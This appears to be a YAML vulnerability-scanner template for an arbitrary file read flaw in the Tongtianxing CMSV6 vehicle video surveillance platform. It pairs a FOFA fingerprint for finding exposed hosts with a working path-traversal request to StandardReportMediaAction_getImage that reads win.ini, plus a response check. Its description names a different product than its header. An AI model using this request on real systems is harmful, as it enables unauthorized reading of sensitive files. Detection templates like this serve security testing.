product: 通天星CMSV6车载视频监控平台
vName: 通天星CMSV6车载视频监控平台 StandardReportMediaAction_getImage任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控，保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞，攻击者可利用该漏洞读取系统敏感文件。
version: ''
note: ''
search:
  FOFA: body="/808gps/images/favicon.ico"
protocol: http
link: https://blog.csdn.net/qq_37113223/article/details/136442965
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /808gps/StandardReportMediaAction_getImage.response?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and